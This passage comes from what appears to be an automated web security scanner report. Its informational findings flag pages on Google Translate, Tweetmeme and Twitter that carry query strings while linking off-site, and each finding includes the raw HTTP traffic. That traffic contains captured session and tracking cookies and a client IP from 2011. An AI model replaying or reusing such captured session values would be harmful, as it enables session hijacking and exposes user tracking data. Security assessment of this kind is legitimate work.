User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJ0fyXF9XJlJlJKHRH/q9T1wLfAFvT1AcyBe3gTVD9y9Uh9aYy==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCx8Vs/gFfw0GIU4J1ufsW6ue6EytNEOGRGe0XtExLxebEKLRWOEvz61pOXhbJFah1e9pBe3EDeyT3qbfCTgWet1w9011QZ1evAbZ+ONx49NDLpQPD9xj9OLh19DDoQSQ==; bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxgyXR9wBpxh1n/6LnutBe/6+e9pBMRtwNJFf9QY26izl; bk=dOTA6tBCxZ/sHNJo; bkc=KJhnRtPQrOgmyceoM3DF/y1exh3xnXsn0G2Cx4O8KHQRdQAy1C0oBT4pFfmCXAc3R4yxeQRsgPysC+ybOaXeMx2ueImc1DeTdkeISiT/dfKyoiXpxT1+isd5iLg4FO7OgTKb+T9jGCdWM64MdTC9XYmj/Kol18Ae2EmOIzt03wyah3MXCVMXvePsmwXeNn6wZueZQdQOlvCX83IGdO8tHMi47hridpRulXLRk4dLs0o4VJGHpA2ACmMd+XF9ky7v72KBTewyxrHE2qU9bAaXh68DdkDPHCEIUMPDF3xbv+dS9jUFQzSUEDeyK2QC27XahCK1qhIc0759TXFV/FicGmsg7vRW82+hGdJ8eicT7WYIRy13wbDjkq2FmG/w9BZIKeT=

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 22:20:20 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=HowK8Vn+oGxsHNJo; expires=Sat, 23-Jul-2011 22:20:20 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpMRZOQ0s5CRae8qKFnYsHp9UWZsMXsMud/QmY7LE/yU9N7RnC6hhnmkIOa8Rw6ydiXw9y1dyxRsRfDZXw8l2kxIueN1cT/OymePiTextT5Q3IOhQKoCdceGmfNCdJUz6cTFTDN4jAjsZhO4m+VPwfZpxCIw5u2OzyxduOIwOgdHyuYcXA1DqIq0H0G7y71q8ja8uXyHrDFHmBc3EcYIHIQf7l/OeW4h9dQHrDp46Uk2f9pyF7XlOe2+8cTULSGds44Dw7Y6Ghy4i/MHwIdUxSIEaeIFsTW7TWU/oI3gyPVeI/f53n0gbGyGFel33c0J5PHI5Rm3cywBn8L9Gn4yybhd0LyFZOXIpCDFQ1SUfRVyEXWePdkBYDTlTTqkz2pY1c7Ow/5sNe8vztGdclEWUy906u9Uy==; expires=Sat, 23-Jul-2011 22:20:20 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJpp8ZPQDwk+bXF//1zcR6NiRteyREqljVVT98E2pZxmaJ1W03q3Syaj9wW7Ym1=; expires=Sat, 23-Jul-2011 22:20:20 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCx8Vs/gFfw0GIU4J1ufsW6ue6EytNEOGRGe0ItaSRQ2Deke/J9gwnqN+5B+jHoaAKtF4P2d2foKDUtRDyQaPSVe9yEj3CqSk395/w15thQ9B1opxy1lfcRLyrGM8ZCNJ3ORzUB5PyXPiOEscQjssxEsOku2qVQbQwQb3UO2GO9A9sp60oq5c423LFSDp/8yh8snyYqdXumQzsi1M1B9v6OKzD=; expires=Sat, 23-Jul-2011 22:20:20 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 25-Jan-2011 22:20:20 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 337
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://osmdcs.interclick.com/pixel.aspx?dp=9EB38251-1678-4E23-B7B6-B2C1C9AD075C&sid=17&account=ALL" width=1 height=1 border=0 alt="">
<img src="http://ad.yieldmanager.com/pixel?adv=60652&code=AS17&t=2&rnd=874442296" width=1 height=1 border=0 alt="">

</div>
...[SNIP]...

20.532. http://translate.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://translate.google.com/?hl=en&tab=wT
The response contains the following links to other domains:
  • http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
  • http://www.youtube.com/?hl=en&tab=T1

Request

GET /?hl=en&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:35 GMT
Expires: Mon, 24 Jan 2011 16:02:35 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=428201d6b77cb58a:TM=1295884955:LM=1295884955:S=v1HYf8Q8-p0F-B9Y; expires=Wed, 23-Jan-2013 16:02:35 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=T1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div id="input_tts_button" style="" class=" tts_vertical_bt"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="input_tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...
<div id="tts_button" style="" class=" "><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...

20.533. http://translate.google.com/translate_t

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_t

Issue detail

The page was loaded from a URL containing a query string:
  • http://translate.google.com/translate_t?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wT
The response contains the following links to other domains:
  • http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
  • http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=T1

Request

GET /translate_t?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:37 GMT
Expires: Mon, 24 Jan 2011 16:02:37 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=58e54bef485bd12c:TM=1295884957:LM=1295884957:S=BeWfOb0gwP1Q71Gx; expires=Wed, 23-Jan-2013 16:02:37 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=T1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div id="input_tts_button" style="" class=" tts_vertical_bt"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="input_tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...
<div id="tts_button" style="" class=" "><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...

20.534. http://tweetmeme.com/eyewonder/interim.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /eyewonder/interim.html

Issue detail

The page was loaded from a URL containing a query string:
  • http://tweetmeme.com/eyewonder/interim.html?url=http://cdn.eyewonder.com/100125/767769/1411955/exp_Inc.js?interim=&clickTagFramePrepend=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3a99/3/0/%252a/w%253B233959639%253B0-0%253B0%253B57224923%253B2321-160/600%253B40054263/40072050/1%253B%253B%257Eokv%253D%253Bpc%253D%255BTPAS_ID%255D%253B%253B%257Eaopt%253D0/ff/ff/ff%253B%257Efdr%253D234359717%253B0-0%253B1%253B42955348%253B2321-160/600%253B40013631/40031418/1%253B%253B%257Eokv%253D%253Bsz%253D160x600%253Bfmzid%253D2673%253B%253Bfmcls%253DATF%253Btile%253D1%253Bqcseg%253DD%253Bqcseg%253DT%253Bqcseg%253D2891%253Bqcseg%253D2867%253Bqcseg%253D2866%253Bqcseg%253D2865%253Bqcseg%253D2363%253Bqcseg%253D2362%253Bqcseg%253D2355%253Bqcseg%253D2353%253Bqcseg%253D2352%253Bqcseg%253D2349%253Bqcseg%253D2339%253Bqcseg%253D1286%253Bqcseg%253D1160%253Bqcseg%253D1159%253Bqcseg%253D1156%253Bqcseg%253D1149%253Bqcseg%253D1148%253Bqcseg%253D983%253B%253B%257Eaopt%253D2/0/ff/0%253B%257Esscs%253D%253f%5Bewclickthru%5D&iframeURL=http%3A//ads.tweetmeme.com/serve.js%3Ftag%3Dhome%26width%3D300%26height%3D600%26rand%3D26297691596&stime=1295907710252&cb=1295907710252&guid=7gUQTFEThr@LSBUPErAIAN
The response contains the following link to another domain:
  • http://fav.or.it/

Request

GET /eyewonder/interim.html?url=http://cdn.eyewonder.com/100125/767769/1411955/exp_Inc.js?interim=&clickTagFramePrepend=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3a99/3/0/%252a/w%253B233959639%253B0-0%253B0%253B57224923%253B2321-160/600%253B40054263/40072050/1%253B%253B%257Eokv%253D%253Bpc%253D%255BTPAS_ID%255D%253B%253B%257Eaopt%253D0/ff/ff/ff%253B%257Efdr%253D234359717%253B0-0%253B1%253B42955348%253B2321-160/600%253B40013631/40031418/1%253B%253B%257Eokv%253D%253Bsz%253D160x600%253Bfmzid%253D2673%253B%253Bfmcls%253DATF%253Btile%253D1%253Bqcseg%253DD%253Bqcseg%253DT%253Bqcseg%253D2891%253Bqcseg%253D2867%253Bqcseg%253D2866%253Bqcseg%253D2865%253Bqcseg%253D2363%253Bqcseg%253D2362%253Bqcseg%253D2355%253Bqcseg%253D2353%253Bqcseg%253D2352%253Bqcseg%253D2349%253Bqcseg%253D2339%253Bqcseg%253D1286%253Bqcseg%253D1160%253Bqcseg%253D1159%253Bqcseg%253D1156%253Bqcseg%253D1149%253Bqcseg%253D1148%253Bqcseg%253D983%253B%253B%257Eaopt%253D2/0/ff/0%253B%257Esscs%253D%253f%5Bewclickthru%5D&iframeURL=http%3A//ads.tweetmeme.com/serve.js%3Ftag%3Dhome%26width%3D300%26height%3D600%26rand%3D26297691596&stime=1295907710252&cb=1295907710252&guid=7gUQTFEThr@LSBUPErAIAN HTTP/1.1
Host: tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=600&rand=26297691596
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __qca=P0-724637325-1295907700201; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __utmb=229010307.1.10.1295907700; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983; __csref=; __cst=c361a3372a99df5c; __csv=286f8b371579253c; __csnv=2d2e35941c7237e0; __ctl=286f8b371579253c1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:21:05 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 5.8889389038086E-5
X-Served-In: 0.00093817710876465
Content-Length: 1221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
<br />&copy; Copyright <a href="http://fav.or.it">fav.or.it</a>
...[SNIP]...

20.535. http://tweetmeme.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
  • http://tweetmeme.com/search?q={searchTerms}
The response contains the following link to another domain:
  • http://fav.or.it/

Request

GET /search?q={searchTerms} HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:00:58 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 7.8201293945312E-5
X-Served-In: 0.0012500286102295
Content-Length: 1221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
<br />&copy; Copyright <a href="http://fav.or.it">fav.or.it</a>
...[SNIP]...

20.536. http://tweetmeme.com/story.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /story.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://tweetmeme.com/story.php?url=
The response contains the following link to another domain:
  • http://fav.or.it/

Request

GET /story.php?url= HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:00:06 GMT
Content-Type: text/html
Connection: close
Content-Length: 1221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
<br />&copy; Copyright <a href="http://fav.or.it">fav.or.it</a>
...[SNIP]...

20.537. http://twitter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://twitter.com/?q=
The response contains the following links to other domains:
  • http://a0.twimg.com/a/1295646587/images/fronts/logo_withbird_home.png
  • http://a0.twimg.com/a/1295646587/images/whatsnew/video-sample-ss.png
  • http://a0.twimg.com/a/1295646587/stylesheets/fronts.css?1295901448
  • http://a0.twimg.com/profile_images/1183095306/977f61bc-d776-406d-bbfa-322d99f9e6ab_normal.jpg
  • http://a0.twimg.com/profile_images/422212230/lacoste_icon_normal.jpg
  • http://a0.twimg.com/profile_images/53798835/snake_cobra_commander_normal.gif
  • http://a1.twimg.com/a/1295646587/images/favicon.ico
  • http://a1.twimg.com/a/1295646587/images/twitter_57.png
  • http://a1.twimg.com/profile_images/112254859/GuyFieri_photo1_white_normal.jpg
  • http://a1.twimg.com/profile_images/139099981/4CAAA_copy_88v2_normal.jpg
  • http://a1.twimg.com/profile_images/675689885/studio_d06_normal.jpg
  • http://a1.twimg.com/profile_images/688563731/maud_newton_normal.jpg
  • http://a1.twimg.com/profile_images/952444947/twitter_logo_bigger.gif_normal.png
  • http://a2.twimg.com/a/1295646587/javascripts/fronts.js
  • http://a2.twimg.com/a/1295646587/javascripts/widgets/widget.js?1295901448
  • http://a2.twimg.com/profile_images/1155883473/mail_normal.jpeg
  • http://a2.twimg.com/profile_images/1161908472/5154528687_bdf5cbb92f_o_normal.jpg
  • http://a2.twimg.com/profile_images/117655834/twitter_blog_realtimeecon_normal.jpg
  • http://a2.twimg.com/profile_images/1213095644/CBS-eye-white-bg_normal.jpg
  • http://a2.twimg.com/profile_images/49246432/jdmisha_small_normal.jpg
  • http://a2.twimg.com/profile_images/61530666/hammer_normal.jpg
  • http://a2.twimg.com/profile_images/818033855/Picture_3_normal.png
  • http://a3.twimg.com/profile_images/1129460752/Twit_normal.png
  • http://a3.twimg.com/profile_images/541529457/Hawaii_15425_MarcoProsch_normal.jpg
  • http://a3.twimg.com/profile_images/71029746/Kjerstin_normal.jpg
  • http://a3.twimg.com/profile_images/77702637/outlet_thumbnail_1_normal.jpg
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

GET /?q= HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:10:02 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910602-49620-38335
ETag: "3681f68f05a59f8a42626fdd110f0f5e"
Last-Modified: Mon, 24 Jan 2011 23:10:02 GMT
X-Runtime: 0.08485
Content-Type: text/html; charset=utf-8
Content-Length: 42958
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910600694364; path=/; expires=Mon, 31-Jan-11 23:10:00 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591060236158132; path=/; expires=Wed, 23 Feb 2011 23:10:02 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYmQ2ZWI3ZWQ4ZmJkOTQyNzE3NDdlZDQyYjBjMjM4%250AY2I6B2lkIiUyOTM4NTVjOTBiODZjZmY2YTJhMmE1ZDJkODc0MTAxNyIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoVaW5fbmV3X3VzZXJfZmxvdzA6D2NyZWF0ZWRfYXRsKwh7hkq6%250ALQE%253D--4d7ff12d14d98e2870af1c579320deda6f99aadf; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1295646587/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1295646587/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a0.twimg.com/a/1295646587/stylesheets/fronts.css?1295901448" media="screen" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<a href="/" id="logo"><img alt="Twitter" height="55" src="http://a0.twimg.com/a/1295646587/images/fronts/logo_withbird_home.png" width="224" /></a>
...[SNIP]...
<a href="/newtwitter?autoplay=true" id="video-thumb"><img alt="Video-sample-ss" height="140" src="http://a0.twimg.com/a/1295646587/images/whatsnew/video-sample-ss.png" width="200" /></a>
...[SNIP]...
<a href="/Kjer" class="avatar-sm" hreflang="en" id="icon_Kjer" rel="Kjer" target="_blank"><img alt="" border="0" height="48" src="http://a3.twimg.com/profile_images/71029746/Kjerstin_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/Kjer" class="avatar" hreflang="en" target="_blank"><img alt="Kjer" border="0" height="48" src="http://a3.twimg.com/profile_images/71029746/Kjerstin_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/k4coleman" class="avatar-sm" hreflang="en" id="icon_k4coleman" rel="k4coleman" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/1155883473/mail_normal.jpeg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/k4coleman" class="avatar" hreflang="en" target="_blank"><img alt="k4coleman" border="0" height="48" src="http://a2.twimg.com/profile_images/1155883473/mail_normal.jpeg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/iamjonsi" class="avatar-sm" hreflang="en" id="icon_iamjonsi" rel="iamjonsi" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/675689885/studio_d06_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/iamjonsi" class="avatar" hreflang="en" target="_blank"><img alt="iamjonsi" border="0" height="48" src="http://a1.twimg.com/profile_images/675689885/studio_d06_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/majornelson" class="avatar-sm" hreflang="en" id="icon_majornelson" rel="majornelson" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/1161908472/5154528687_bdf5cbb92f_o_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/majornelson" class="avatar" hreflang="en" target="_blank"><img alt="majornelson" border="0" height="48" src="http://a2.twimg.com/profile_images/1161908472/5154528687_bdf5cbb92f_o_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/DailyHealthTips" class="avatar-sm" hreflang="en" id="icon_DailyHealthTips" rel="DailyHealthTips" target="_blank"><img alt="" border="0" height="48" src="http://a3.twimg.com/profile_images/1129460752/Twit_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/DailyHealthTips" class="avatar" hreflang="en" target="_blank"><img alt="DailyHealthTips" border="0" height="48" src="http://a3.twimg.com/profile_images/1129460752/Twit_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/estria" class="avatar-sm" hreflang="en" id="icon_estria" rel="estria" target="_blank"><img alt="" border="0" height="48" src="http://a3.twimg.com/profile_images/541529457/Hawaii_15425_MarcoProsch_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/estria" class="avatar" hreflang="en" target="_blank"><img alt="estria" border="0" height="48" src="http://a3.twimg.com/profile_images/541529457/Hawaii_15425_MarcoProsch_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/LACOSTE" class="avatar-sm" hreflang="en" id="icon_LACOSTE" rel="LACOSTE" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/422212230/lacoste_icon_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/LACOSTE" class="avatar" hreflang="en" target="_blank"><img alt="LACOSTE" border="0" height="48" src="http://a0.twimg.com/profile_images/422212230/lacoste_icon_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/CBSNews" class="avatar-sm" hreflang="en" id="icon_CBSNews" rel="CBSNews" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/1213095644/CBS-eye-white-bg_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/CBSNews" class="avatar" hreflang="en" target="_blank"><img alt="CBSNews" border="0" height="48" src="http://a2.twimg.com/profile_images/1213095644/CBS-eye-white-bg_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/DellOutlet" class="avatar-sm" hreflang="en" id="icon_DellOutlet" rel="DellOutlet" target="_blank"><img alt="" border="0" height="48" src="http://a3.twimg.com/profile_images/77702637/outlet_thumbnail_1_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/DellOutlet" class="avatar" hreflang="en" target="_blank"><img alt="DellOutlet" border="0" height="48" src="http://a3.twimg.com/profile_images/77702637/outlet_thumbnail_1_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/geologynews" class="avatar-sm" hreflang="en" id="icon_geologynews" rel="geologynews" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/61530666/hammer_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/geologynews" class="avatar" hreflang="en" target="_blank"><img alt="geologynews" border="0" height="48" src="http://a2.twimg.com/profile_images/61530666/hammer_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/SarahBrownUK" class="avatar-sm" hreflang="en" id="icon_SarahBrownUK" rel="SarahBrownUK" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/1183095306/977f61bc-d776-406d-bbfa-322d99f9e6ab_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/SarahBrownUK" class="avatar" hreflang="en" target="_blank"><img alt="SarahBrownUK" border="0" height="48" src="http://a0.twimg.com/profile_images/1183095306/977f61bc-d776-406d-bbfa-322d99f9e6ab_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/maudnewton" class="avatar-sm" hreflang="en" id="icon_maudnewton" rel="maudnewton" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/688563731/maud_newton_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/maudnewton" class="avatar" hreflang="en" target="_blank"><img alt="maudnewton" border="0" height="48" src="http://a1.twimg.com/profile_images/688563731/maud_newton_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/AAA_Travel" class="avatar-sm" hreflang="en" id="icon_AAA_Travel" rel="AAA_Travel" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/139099981/4CAAA_copy_88v2_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/AAA_Travel" class="avatar" hreflang="en" target="_blank"><img alt="AAA_Travel" border="0" height="48" src="http://a1.twimg.com/profile_images/139099981/4CAAA_copy_88v2_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/ChefGuyFieri" class="avatar-sm" hreflang="en" id="icon_ChefGuyFieri" rel="ChefGuyFieri" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/112254859/GuyFieri_photo1_white_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
